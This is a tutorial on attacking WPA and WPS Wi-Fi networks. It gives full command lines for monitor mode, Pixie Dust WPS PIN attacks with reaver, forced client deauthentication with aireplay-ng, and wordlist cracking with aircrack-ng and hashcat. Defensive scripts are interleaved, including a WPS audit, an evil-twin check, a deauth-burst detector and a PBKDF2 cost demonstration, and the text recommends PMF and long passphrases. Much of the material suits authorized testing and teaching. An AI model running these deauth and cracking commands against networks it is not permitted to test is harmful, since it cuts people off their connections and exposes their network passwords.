Disclaimer: It is a good idea to test your own personal wireless network or your company wireless network. Do this at your own risk and make sure you have permission to do the below.

The tools we will use

Tool                  Purpose
airmon-ng             Get your wireless NIC into monitor mode
airodump-ng           List all the wireless networks your wireless NIC can see
reaver (wash)         WPS based cracking (wash finds WPS-enabled routers, reaver attacks them)
aireplay-ng           Deauth clients to force a WPA handshake
aircrack-ng           Crack the password of a captured WPA handshake
hashcat (optional)    Faster than aircrack-ng and can use your GPU

Step 1: Get your wireless NIC into monitor mode

Get your wireless NIC name; usually it is wlan0:

iwconfig

Now kill all processes that might hold on to that NIC and prevent it from entering monitor mode, such as NetworkManager:

sudo airmon-ng check kill

And now put your NIC into monitor mode:

sudo airmon-ng start wlan0

Run iwconfig again; you should now see an interface named something like wlan0mon with Mode:Monitor. Take note that not all wireless NICs (or their drivers) support monitor mode.

Get your wireless NIC out of monitor mode and put things back the way they were

This will put things back to normal:

sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart

Step 2: Airodump

Now run this command:

sudo airodump-ng wlan0mon

If all goes well, you will see output such as this:

[screenshot: airodump output]

The above command will channel hop, i.e. scan all channels, so if you want to monitor only a specific channel, run this command:

sudo airodump-ng -c 6 wlan0mon

And if you want to save the captured packets to a file, run this command (airodump-ng appends a counter to the prefix, so this writes capture-01.cap together with a capture-01.csv summary):

sudo airodump-ng -w capture wlan0mon

Step 2.1: Reaver and wash for WPS

Let's sidetrack to reaver quickly, as it focuses on WPS, which can be quite a lucrative attack vector. WPS 2.0, which most devices use nowadays, is not as susceptible to these attacks, but it is definitely worth a look.

Just as airodump-ng above showed us wireless routers with their encryption and cipher, wash shows us which routers have WPS enabled, which WPS version they run, and whether WPS is currently locked.

sudo wash -i wlan0mon
[screenshot: reaver wash output]

Once you have found a suitable target, run this command:

sudo reaver -i wlan0mon -b <target_bssid> -c <channel> -K 1

(-K 1 tells reaver to use the Pixie Dust attack)

Take note that too many failed PIN attempts will lock WPS on the wireless router if you are not careful, so check the reaver help with sudo reaver -h for the options that slow things down a bit.
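The same wash output is useful from the other side of the table: run against your own routers it tells you which of them still expose WPS, and a router that already shows as locked has been seeing failed PIN attempts from somebody. The script below is an added example, not code from the original post or from the reaver project. It assumes the wash 1.6 column layout (BSSID, Ch, dBm, WPS, Lck, Vendor, ESSID) and the rows it parses are constructed sample data, not a real scan.

```python
"""Audit WPS exposure from the text output of `wash -i wlan0mon`.

Added example, not part of the original post. It assumes the wash 1.6 column
layout (BSSID, Ch, dBm, WPS, Lck, Vendor, ESSID); the rows are constructed.
"""
import re

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed sample in wash's table layout (not a real scan).
SAMPLE_WASH = """\
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
C8:51:00:00:00:01    6  -40  2.0  No   Broadcom  HomeNet
C8:51:00:00:00:02   11  -55  1.0  No   RalinkTe  Old Router
00:11:22:33:44:55    1  -70  2.0  Yes  AtherosC  Guest
"""


def parse_wash(text):
    """Return one dict per AP row; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 6)   # ESSID is the remainder and may contain spaces
        if len(parts) < 7 or not MAC_RE.match(parts[0]):
            continue
        bssid, ch, dbm, wps, lck, vendor, essid = parts
        rows.append({"bssid": bssid, "channel": int(ch), "dbm": int(dbm),
                     "wps": wps, "locked": lck.lower() == "yes",
                     "vendor": vendor, "essid": essid.strip()})
    return rows


def assess(row):
    """Rate the WPS exposure of one AP from a defender's point of view."""
    if row["locked"]:
        # Locked means the AP has already counted too many failed PIN attempts.
        # On your own AP that is evidence of an attack in progress, not a safe state.
        return "locked"
    if row["wps"].startswith("1."):
        return "high"      # WPS 1.0 predates the mandatory lock-down that 2.0 introduced
    return "medium"        # WPS 2.0 still exposes the PIN / Pixie Dust surface; disable if unused


def audit(text):
    """Map BSSID -> rating for every AP in a wash dump."""
    return {row["bssid"]: assess(row) for row in parse_wash(text)}


if __name__ == "__main__":
    for row in parse_wash(SAMPLE_WASH):
        print(f"{row['bssid']}  ch{row['channel']:>2}  WPS {row['wps']}  "
              f"{'LOCKED' if row['locked'] else 'open':6}  {row['essid']!r}: {assess(row)}")
```

Feed it a real dump with `wash -i wlan0mon > wash.txt` and `audit(open("wash.txt").read())`. The one rating worth acting on immediately is "locked" on a BSSID you own: the router did not lock itself, something made it do so.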

Step 3: WPA handshake attack

In this section we will focus on capturing the WPA (4-way) handshake that we can then crack offline using a wordlist such as rockyou.txt.

Run the command below to capture packets for only one specific wireless router and to see which clients are connected to it. We will grab the WPA handshake packets from these clients.

(The output file named in the command below will hold the captured packets we use when cracking the password. airodump-ng appends a counter to the prefix, so the file will be called <output_file>-01.cap.)

sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> wlan0mon
[screenshot: airodump single client]
  • The green block is the BSSID we are sniffing for clients
  • The yellow block shows all the clients connected to this BSSID
  • The red block above it, reading “WPA handshake: C8:51:*”, appears once we have captured a WPA handshake, which we will get to below.
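The -w prefix also produces <output_file>-01.csv with the same AP and station tables that the screen shows, which makes this step scriptable. The following is an added example, not code from the original post or from the aircrack-ng project: it parses that CSV, lists which clients are associated with a BSSID, and flags an ESSID that is advertised by more than one BSSID, which is what a rogue AP cloning your SSID looks like when you run this against your own network. The column layout is the one airodump-ng writes; the rows are constructed sample data, not a real capture.

```python
"""Parse an airodump-ng CSV (<prefix>-01.csv) and audit APs and clients.

Added example, not part of the original post. The column layout is
airodump-ng's own CSV format (AP table, blank line, station table); the rows
below are constructed sample data.
"""
import csv
import io
from collections import defaultdict

# Constructed sample in airodump-ng CSV layout (not a real capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
C8:51:00:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   7, HomeNet,
C8:51:00:00:00:02, 2024-01-01 10:01:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,   80,  0,   0.  0.  0.  0,   7, HomeNet,
00:11:22:33:44:55, 2024-01-01 10:02:00, 2024-01-01 10:05:00,  1,  54, OPN,   ,    ,  -70,   10,  0,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:AA:AA:AA:AA:01, 2024-01-01 10:00:30, 2024-01-01 10:05:00, -50,  200, C8:51:00:00:00:01, HomeNet
AA:AA:AA:AA:AA:02, 2024-01-01 10:03:00, 2024-01-01 10:05:00, -60,   20, (not associated), HomeNet,CoffeeShop
"""


def parse_airodump_csv(text):
    """Return (aps, stations): lists of dicts keyed by the CSV header names."""
    aps, stations, current, headers = [], [], None, None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [cell.strip() for cell in row]
        if not any(row):
            continue                      # blank line separating the two tables
        if row[0] == "BSSID":             # header of the AP table
            current, headers = aps, row
            continue
        if row[0] == "Station MAC":       # header of the station table
            current, headers = stations, row
            continue
        if current is None:
            continue
        if len(row) > len(headers):       # probed ESSIDs are themselves comma separated
            row = row[:len(headers) - 1] + [",".join(row[len(headers) - 1:])]
        current.append(dict(zip(headers, row)))
    return aps, stations


def stations_for(stations, bssid):
    """Client MACs currently associated with the given BSSID."""
    return [s["Station MAC"] for s in stations if s["BSSID"].upper() == bssid.upper()]


def duplicate_essids(aps):
    """ESSIDs advertised by more than one BSSID: the signature of an evil-twin AP."""
    by_essid = defaultdict(list)
    for ap in aps:
        if ap["ESSID"]:
            by_essid[ap["ESSID"]].append(ap["BSSID"])
    return {essid: bssids for essid, bssids in by_essid.items() if len(bssids) > 1}


def open_networks(aps):
    """BSSIDs running with no encryption at all."""
    return [ap["BSSID"] for ap in aps if ap["Privacy"] == "OPN"]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in aps:
        print(ap["BSSID"], ap["channel"], ap["Privacy"], ap["ESSID"],
              "clients:", stations_for(stations, ap["BSSID"]))
    print("duplicate ESSIDs:", duplicate_essids(aps))
    print("open networks:", open_networks(aps))
```

A multi-AP or dual-band deployment legitimately shows one ESSID on several BSSIDs, so compare the BSSID list against your own inventory rather than treating every duplicate as hostile; a BSSID you do not own advertising your ESSID is the one to chase.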

Forcing a deauth to get a WPA handshake

You can either wait for a handshake to occur, which happens when a client connects or a connected client reauthenticates, or you can force a connected client to reauthenticate. We will force a client to reauthenticate by sending deauth packets to that client.

Open up a new terminal and issue this command:

sudo aireplay-ng --deauth 10 -a <BSSID> -c <Client_MAC> wlan0mon
[screenshot: deauth output]

You will know the deauth was successful when the terminal in which airodump is running displays this in the top right corner:

[screenshot: successful deauth]
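What aireplay-ng puts on the air here is a burst of identical deauthentication frames spoofed with the AP's address, dozens per round, which is easy to tell apart from the single deauth a client sends when it leaves. The script below is an added example, not code from the original post or from any of the tools it uses: it reads a tab-separated export of a monitor-mode capture and flags source/target pairs that receive a burst of deauths inside a short window. The export format is an assumption (for instance `tshark -r capture-01.cap -T fields -e frame.time_epoch -e wlan.fc.type_subtype -e wlan.sa -e wlan.da -e wlan.bssid`), and the sample lines are constructed, not taken from a real capture.

```python
"""Detect deauthentication bursts in a monitor-mode capture.

Added example, not part of the original post. It reads tab-separated lines of
  <epoch time> <frame type/subtype> <source MAC> <destination MAC> <BSSID>
as an assumed tshark field export would produce; the sample lines below are
constructed, not from a real capture.
"""
from collections import defaultdict

DEAUTH = 0x0C   # 802.11 management frame subtype 12 = deauthentication

# Constructed export: a beacon, a data frame, eight deauths within a second
# aimed at one client, and one isolated deauth to another client.
SAMPLE_EXPORT = "\n".join(
    ["1700000000.000\t0x0008\tC8:51:00:00:00:01\tFF:FF:FF:FF:FF:FF\tC8:51:00:00:00:01",
     "1700000000.100\t0x0028\tAA:AA:AA:AA:AA:01\tC8:51:00:00:00:01\tC8:51:00:00:00:01"]
    + [f"{1700000001 + i * 0.1:.3f}\t0x000c\tC8:51:00:00:00:01\tAA:AA:AA:AA:AA:01\tC8:51:00:00:00:01"
       for i in range(8)]
    + ["1700000030.000\t0x000c\tC8:51:00:00:00:01\tAA:AA:AA:AA:AA:02\tC8:51:00:00:00:01"]
)


def parse_export(text):
    """Return (time, subtype, src, dst, bssid) tuples; subtype may be hex or decimal."""
    frames = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, subtype, sa, da, bssid = line.split("\t")
        frames.append((float(t), int(subtype, 0), sa.upper(), da.upper(), bssid.upper()))
    return frames


def deauth_bursts(frames, window=5.0, threshold=5):
    """Flag (source, target) pairs with >= threshold deauths inside any `window` seconds.

    A client leaving sends one deauth; a burst of identical ones addressed to a
    single client is what a forced deauth looks like on the air.
    """
    times_by_pair = defaultdict(list)
    for t, subtype, sa, da, _ in frames:
        if subtype == DEAUTH:
            times_by_pair[(sa, da)].append(t)
    alerts = []
    for (sa, da), times in times_by_pair.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):        # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"source": sa, "target": da, "peak": peak, "total": len(times)})
    return alerts


if __name__ == "__main__":
    for alert in deauth_bursts(parse_export(SAMPLE_EXPORT)):
        print(f"deauth burst: {alert['source']} -> {alert['target']}: "
              f"{alert['peak']} frames in one window, {alert['total']} total")
```

The structural fix is 802.11w Protected Management Frames: with PMF enabled (optional on WPA2 where the hardware supports it, mandatory in WPA3) unprotected deauth frames are ignored, so the forced reconnect, and the handshake it yields, never happens.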

Step 4: Crack the WPA password

Let's validate our capture file to make sure it does contain a valid handshake:

sudo aircrack-ng <output_file>-01.cap
[screenshot: validate output capture file]

Wordlists

You should have several wordlists in /usr/share/wordlists, but we will use rockyou.txt. Unzip rockyou.txt.gz using this command:

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Now you can start the cracking process:

sudo aircrack-ng <output_file>-01.cap -w /usr/share/wordlists/rockyou.txt

This will take quite some time depending on your CPU. On my old 4th gen dual core i5 laptop CPU, I only get 3500 or so hashes per second, which is extremely slow compared to a modern CPU or GPU.
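The reason those rates are so low is the key derivation itself: WPA/WPA2-Personal turns the passphrase into the 256-bit PMK with PBKDF2-HMAC-SHA1 over 4096 iterations, salted with the SSID, and every wordlist entry has to pay for those 4096 rounds before the handshake MIC can even be checked. The block below is an added example, not code from the original post or from aircrack-ng: it derives the PMK exactly as the standard defines it (checked against the IEEE 802.11 test vector for passphrase "password" and SSID "IEEE"), measures how many guesses per second this machine manages in Python, and turns a wordlist size into a worst-case time. The rockyou.txt line count used is an assumption.

```python
"""Why WPA-PSK cracking is slow: the cost of one guess.

Added example, not part of the original post. The PMK derivation is the one
defined by the 802.11 standard; the rockyou.txt line count is an assumption.
"""
import hashlib
import time

ROCKYOU_LINES = 14_344_392   # assumed: roughly the line count of rockyou.txt


def wpa_pmk(ssid, passphrase):
    """PMK for WPA/WPA2-Personal: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def guesses_per_second(ssid, seconds=0.5):
    """Measure how many PMKs this process can derive per second (single core)."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        wpa_pmk(ssid, f"candidate{n}")   # constructed throwaway candidates
        n += 1
    return n / (time.perf_counter() - start)


def hours_to_exhaust(entries, rate):
    """Worst-case time to try every wordlist entry at `rate` guesses per second."""
    return entries / rate / 3600


if __name__ == "__main__":
    # IEEE 802.11 test vector: passphrase "password", SSID "IEEE".
    print("PMK:", wpa_pmk("IEEE", "password").hex())
    rate = guesses_per_second("IEEE")
    print(f"{rate:,.0f} guesses/s here; rockyou.txt would take "
          f"{hours_to_exhaust(ROCKYOU_LINES, rate):.1f} h, "
          f"vs {hours_to_exhaust(ROCKYOU_LINES, 3500):.1f} h at 3500/s")
```

Two things follow from the SSID salt and the 4096 rounds: a precomputed table only ever helps against one SSID, and the time budget scales linearly with the wordlist, so a long random passphrase that appears in no list is not found by this procedure at any hash rate.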

Below is a bonus section where we will use hashcat.

Bonus Section: Hashcat

Hashcat tends to be quite a bit faster, in my case, about 15% on the CPU, plus it allows you to use your GPU if it is supported.

We first have to convert the cap file into hashcat's hash format (hcxpcapngtool writes the 22000 format that hashcat's -m 22000 mode reads, whatever extension you give the output file):

sudo apt-get install hcxtools
sudo hcxpcapngtool -o <output_file>.hccapx <input_file>.cap

To see whether you can use your GPU, issue this command:

sudo hashcat -I

This will show all the devices you can use in the cracking process. I only have 1 device so I will specify “-d 1” in my hashcat command to use the first device which is my CPU.

Let's fire up hashcat to crack the password:

hashcat -m 22000 -a 0 -d 1 capture.hccapx /usr/share/wordlists/rockyou.txt

Now just let it finish and see if rockyou.txt contained the password!